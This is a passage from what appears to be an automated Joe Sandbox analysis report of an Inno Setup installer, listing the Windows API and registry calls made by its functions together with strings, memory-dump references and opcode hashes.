                                                                                    • Part of subcall function 0044E898: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048BF91), ref: 0044E8D3
                                                                                    • Part of subcall function 0044E898: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044E8D9
                                                                                    • Part of subcall function 00451144: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004511DD,?,?,?,?,00000000,?,0048BF9B), ref: 00451164
                                                                                    • Part of subcall function 00451144: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045116A
                                                                                    • Part of subcall function 00451144: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004511DD,?,?,?,?,00000000,?,0048BF9B), ref: 0045117E
                                                                                    • Part of subcall function 00451144: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451184
                                                                                    • Part of subcall function 0048907C: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00489081
                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,0048BFF2), ref: 0048BFC4
                                                                                    • Part of subcall function 0048BD5C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048BFCE,00000001,00000000,0048BFF2), ref: 0048BD66
                                                                                    • Part of subcall function 0048BD5C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0048BD6C
                                                                                    • Part of subcall function 0042444C: SendMessageA.USER32(?,0000B020,00000000,?), ref: 0042446B
                                                                                    • Part of subcall function 0042423C: SetWindowTextA.USER32(?,00000000), ref: 00424254
                                                                                  • ShowWindow.USER32(?,00000005,00000000,0048BFF2), ref: 0048C035
                                                                                    • Part of subcall function 00477680: SetActiveWindow.USER32(?), ref: 0047771A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule$AddressProc$Window$ActiveClipboardCommandCurrentErrorF551FormatLineMessageModeRegisterSendShowTextThreadVersion
                                                                                  • String ID: Setup
                                                                                  • API String ID: 1320996880-3839654196
                                                                                  • Opcode ID: 96ef5ae8938251e1304e89ce5f25fcabed527aca7d7308ab38c3f1d39e550390
                                                                                  • Instruction ID: 517b62e27b71b934a727bb26a9a19209dbe88406b34cf6fa1c717a673ad3741c
                                                                                  • Opcode Fuzzy Hash: 96ef5ae8938251e1304e89ce5f25fcabed527aca7d7308ab38c3f1d39e550390
                                                                                  • Instruction Fuzzy Hash: CA31C471204600AFE201BBB7EC5395D37A4EB89718BA2487FF50496663DE3D58418B7E
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,ProductType,00000000,?,00000000,?,00000000,0042DAD9), ref: 0042D9F0
                                                                                  • RegQueryValueExA.ADVAPI32(?,ProductType,00000000,?,00000000,00000000,?,ProductType,00000000,?,00000000,?,00000000,0042DAD9), ref: 0042DA48
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID: ProductType
                                                                                  • API String ID: 3660427363-120863269
                                                                                  • Opcode ID: f1c88e099fece67b92f9d5540a263f037ca2b3623a04ea9223afa9ad8deba29c
                                                                                  • Instruction ID: 0f1c970e125f039ce8a503da000e0aea9c8364338fa780b647b5602e600581e8
                                                                                  • Opcode Fuzzy Hash: f1c88e099fece67b92f9d5540a263f037ca2b3623a04ea9223afa9ad8deba29c
                                                                                  • Instruction Fuzzy Hash: 3841F770E08229AEDB11DF95D881FAFB7B8EB45314F9485A6E410A7280D778AE44CB58
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00451A0B,?,?,00000000,0048E628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00451962
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00451A0B,?,?,00000000,0048E628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045196B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID: .tmp
                                                                                  • API String ID: 1375471231-2986845003
                                                                                  • Opcode ID: 6ad3b66c70a657b721a76c67314d2165c98ff4c5560a6d36ecef2f93dd6f7391
                                                                                  • Instruction ID: e8662c5fe0d2ba43a199c3edf473248879cd4764848c3c7ea0c1a15854a8f42c
                                                                                  • Opcode Fuzzy Hash: 6ad3b66c70a657b721a76c67314d2165c98ff4c5560a6d36ecef2f93dd6f7391
                                                                                  • Instruction Fuzzy Hash: A4211775A002489BDB01EFA1C892ADEB7B9EF44305F50457BF801B7352DA7CAE058B69
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,0047230A,00000000,00472320,?,?,?,?,00000000,?,00475DBC), ref: 004720E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                                  • API String ID: 47109696-1113070880
                                                                                  • Opcode ID: 3a69c1a07551a5e3172ccd064997fd8b7a9faa1135cd74c7bfa8418d95798b19
                                                                                  • Instruction ID: 5a6d9427a65942df2f89964e629fc28c5581e2eaaa43f9552825e22b00fad24d
                                                                                  • Opcode Fuzzy Hash: 3a69c1a07551a5e3172ccd064997fd8b7a9faa1135cd74c7bfa8418d95798b19
                                                                                  • Instruction Fuzzy Hash: 7CF0A734B04144ABCB00EBA5AD52B5F3399DB41304F60C47AA604DB242D679AE01D71C
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CE6D), ref: 0046CD09
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CE6D), ref: 0046CD20
                                                                                    • Part of subcall function 004513F0: GetLastError.KERNEL32(00000000,00451E05,00000005,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811,00000000), ref: 004513F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                  • String ID: CreateFile
                                                                                  • API String ID: 2528220319-823142352
                                                                                  • Opcode ID: 3d7d25c822888780f1b7db5f73bdf787d3e3b3fa0d553308f5f9fea012b55c2a
                                                                                  • Instruction ID: b5e1978536ca7cf159aec59e6529e54b1624b124b75389fe1e2832226c3a213c
                                                                                  • Opcode Fuzzy Hash: 3d7d25c822888780f1b7db5f73bdf787d3e3b3fa0d553308f5f9fea012b55c2a
                                                                                  • Instruction Fuzzy Hash: 75E0ED743403046FE610B669DCC6F5A7B999B04768F108165FA84AF3E2C5B9FD40865D
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045A646
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: -$LzmaDecoderInit failed (%d)
                                                                                  • API String ID: 4275171209-4285503710
                                                                                  • Opcode ID: d3b822a0b1e6260aa635924e11a9ba9dca49f4e4103babb017b9a507c2a58a72
                                                                                  • Instruction ID: 591c8a6900c43584e2ee60909027df2e41258ba8a38a9709673e0c31a0d13b09
                                                                                  • Opcode Fuzzy Hash: d3b822a0b1e6260aa635924e11a9ba9dca49f4e4103babb017b9a507c2a58a72
                                                                                  • Instruction Fuzzy Hash: 9451A170A04208AFDB00DFA9C445B9EBBB4EF45305F14426AEC44EB243D778DD59CB5A
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042438A
                                                                                  • TranslateMessage.USER32(?), ref: 00424407
                                                                                  • DispatchMessageA.USER32(?), ref: 00424411
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4217535847-0
                                                                                  • Opcode ID: c3456a2745c945d23fa910d399d9e0da92c4e524f06eecc47a079e6b22d753be
                                                                                  • Instruction ID: 143b27bece05924c064395ddbd5fa285d0aa9147175cf9be5125d281f5232572
                                                                                  • Opcode Fuzzy Hash: c3456a2745c945d23fa910d399d9e0da92c4e524f06eecc47a079e6b22d753be
                                                                                  • Instruction Fuzzy Hash: 7211943030432056EA20F6A5B94179B73D4DFC1744F80486EF98997382D7BD9E4997AB
                                                                                  APIs
                                                                                  • SetPropA.USER32(00000000,00000000), ref: 004165E2
                                                                                  • SetPropA.USER32(00000000,00000000), ref: 004165F7
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041661E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Prop$Window
                                                                                  • String ID:
                                                                                  • API String ID: 3363284559-0
                                                                                  • Opcode ID: 92ab24527cce6f6cf51157fa3b563f6743bb940d3ff4fa006b4ba98501328abf
                                                                                  • Instruction ID: b7e079e64b9ca8d26728f0ea6f266d850dce2f992631cbd97f7c1cdcc8b46537
                                                                                  • Opcode Fuzzy Hash: 92ab24527cce6f6cf51157fa3b563f6743bb940d3ff4fa006b4ba98501328abf
                                                                                  • Instruction Fuzzy Hash: F1F01271701210ABE710AB999C85FA637ECAB0D704F150179BA04EF286C678DC4087A8
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID: ,Zz
                                                                                  • API String ID: 2087232378-1049774954
                                                                                  • Opcode ID: bc88a04ab1fab4569eb16abb41ac2df9792e7e50eb93427da6a7b4240a68064a
                                                                                  • Instruction ID: 7590be40ed32e23a83c57edb93f3bacdf6c140b312311b9ab88974abafcbc8f4
                                                                                  • Opcode Fuzzy Hash: bc88a04ab1fab4569eb16abb41ac2df9792e7e50eb93427da6a7b4240a68064a
                                                                                  • Instruction Fuzzy Hash: 08F0A772B0073067EB60596A4C81F5755849FC5B98F154076FD0DFF3E9D6B58C0142A9
                                                                                  APIs
                                                                                  • SetActiveWindow.USER32(?), ref: 0047771A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveWindow
                                                                                  • String ID: InitializeWizard
                                                                                  • API String ID: 2558294473-2356795471
                                                                                  • Opcode ID: baee3863902ebf8d04462d4b871e076fb17f52db88298e3fcf6c2d4bc6cca23c
                                                                                  • Instruction ID: 6bc677aefb944b29b69e1904bd5503a38e6abdef7f7aa0e8c60f174ec8c5f8b7
                                                                                  • Opcode Fuzzy Hash: baee3863902ebf8d04462d4b871e076fb17f52db88298e3fcf6c2d4bc6cca23c
                                                                                  • Instruction Fuzzy Hash: 5511A534218640AFD704DB6EED42B9D7BA4E709324F90487FE504872A1EB7A6C44C71D
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004721E6,00000000,00472320), ref: 00471FF5
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00471FC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                  • API String ID: 47109696-1019749484
                                                                                  • Opcode ID: 9bffc92b0543ca29f453e07f11aaea6017a79ac0d24149eb66186d2e8584021a
                                                                                  • Instruction ID: 4a7a769be95154363c397eff2663aec010ea170df40fba07e6f37e5bf3138bf5
                                                                                  • Opcode Fuzzy Hash: 9bffc92b0543ca29f453e07f11aaea6017a79ac0d24149eb66186d2e8584021a
                                                                                  • Instruction Fuzzy Hash: EBF0822170452467EA15A55E5D42B9EA29C8F84758F20407BFA08DB252DAED9E0143AC
                                                                                  APIs
                                                                                  • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,0048F038,?,004679A3,?,00000000,00467DB3,?,_is1), ref: 00467833
                                                                                  Strings
                                                                                  • Inno Setup: Setup Version, xrefs: 00467831
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID: Inno Setup: Setup Version
                                                                                  • API String ID: 3702945584-4166306022
                                                                                  • Opcode ID: 9432c8cd2dfd12df38138afc7850909df654920a4b9f4a6c4da45bdaf4261649
                                                                                  • Instruction ID: 3c4f24ff908a0cbcdb1afd200f01d97e7dd2d7202284d25742a9aa7dbbf450b8
                                                                                  • Opcode Fuzzy Hash: 9432c8cd2dfd12df38138afc7850909df654920a4b9f4a6c4da45bdaf4261649
                                                                                  • Instruction Fuzzy Hash: 5BE065713006043BD710AA2E9C85F5BABDDDF89368F00407AB908EB351D578DD018668
                                                                                  APIs
                                                                                  • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,0048F038,00000004,00000001,?,00467D26,?,?,00000000,00467DB3,?,_is1,00000001), ref: 00467893
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID: NoModify
                                                                                  • API String ID: 3702945584-1699962838
                                                                                  • Opcode ID: 5778ffc1545edf26bc22d1f0db25d1aa2024c9f6e136555170aabf7ef8d3d47d
                                                                                  • Instruction ID: e91b13d3ba4d14f1b769e457ec71443a564b679ac2f1abe8aea155b5b0153629
                                                                                  • Opcode Fuzzy Hash: 5778ffc1545edf26bc22d1f0db25d1aa2024c9f6e136555170aabf7ef8d3d47d
                                                                                  • Instruction Fuzzy Hash: 1FE04FB0644304BFEB04EB55CD4AF6B77ACDB48724F104059BA049B280EAB4FE00C668
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  Strings
                                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 0042DBD6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID: System\CurrentControlSet\Control\Windows
                                                                                  • API String ID: 71445658-1109719901
                                                                                  • Opcode ID: b326c94a6d53eabc1fecc3377cd6a6e19a67959ef74501fcb58f06194455bfb0
                                                                                  • Instruction ID: 1e4431b4ebb6c32d1244ec3900ba817f91523090d23412baa55edfdc376c7643
                                                                                  • Opcode Fuzzy Hash: b326c94a6d53eabc1fecc3377cd6a6e19a67959ef74501fcb58f06194455bfb0
                                                                                  • Instruction Fuzzy Hash: CAD09276910128BB9B009A89DC41DFB77ADEB19360F51802BF91897600C2B4AC519BF4
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DD5E,?,?,00000008,00000000,00000000,0042DD8B), ref: 0042DCF4
                                                                                  • RegCloseKey.ADVAPI32(?,0042DD65,?,00000000,00000000,00000000,00000000,00000000,0042DD5E,?,?,00000008,00000000,00000000,0042DD8B), ref: 0042DD58
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnumOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1332880857-0
                                                                                  • Opcode ID: b349a22ba6550b0ab10a714cd30ac296fa5bc8227d0830bc103148cda89d1b6c
                                                                                  • Instruction ID: b6a1ca0c379b243c16df930825cbbaed1ad5f1dde54fad02b5bd7e8001dbe2ac
                                                                                  • Opcode Fuzzy Hash: b349a22ba6550b0ab10a714cd30ac296fa5bc8227d0830bc103148cda89d1b6c
                                                                                  • Instruction Fuzzy Hash: C9319530F046186EDB11DFA2DC52BBFBBB8EB44304F90447BA500F7281D6789A01CA69
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF5A
                                                                                  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0B7,00000000,0040B0CF,?,?,?,?), ref: 0040AF6B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindFree
                                                                                  • String ID:
                                                                                  • API String ID: 4097029671-0
                                                                                  • Opcode ID: 2f3640df18d82f7baf8716dc9baab1883b5fcf3b20481ebe3737eae87e637292
                                                                                  • Instruction ID: 4c396d32fc473e9f5656ed958619e80804cc97e860d37ee0d1873d06264cfb2c
                                                                                  • Opcode Fuzzy Hash: 2f3640df18d82f7baf8716dc9baab1883b5fcf3b20481ebe3737eae87e637292
                                                                                  • Instruction Fuzzy Hash: 2B012BB1304300AFD700EF66DC52A1A77BDDB85718711847AF900EB3D1D67A9C10976E
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041EE6B
                                                                                  • 73A25940.USER32(00000000,0041EDCC,00000000,00000000,0041EE88,?,00000000,0041EEBF,?,?,?,00000000), ref: 0041EE71
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A25940CurrentThread
                                                                                  • String ID:
                                                                                  • API String ID: 2655091166-0
                                                                                  • Opcode ID: 5acdff55835fca25cf2450f29afd84602b26763e78c7d75ef0b9a459c0ce9f07
                                                                                  • Instruction ID: 1a721b605b1a262330f76d6630a2ee42c05b40ab09b62db80fb884397a9b6640
                                                                                  • Opcode Fuzzy Hash: 5acdff55835fca25cf2450f29afd84602b26763e78c7d75ef0b9a459c0ce9f07
                                                                                  • Instruction Fuzzy Hash: 8F015B75A05704AFD705DF66EC1195BBBE8E789714B21887BE804D36A0F6345800EF18
                                                                                  APIs
                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00450C8E
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00450CB4), ref: 00450C96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastMove
                                                                                  • String ID:
                                                                                  • API String ID: 55378915-0
                                                                                  • Opcode ID: 9dda91361662054eb01da6890b4592a34015e15ce18affdee5ac8f1e4e79cee9
                                                                                  • Instruction ID: 7d9736f20a2fb1a6d228470879ab456ea17cd5aa177f8c36b667451a0f61ff1c
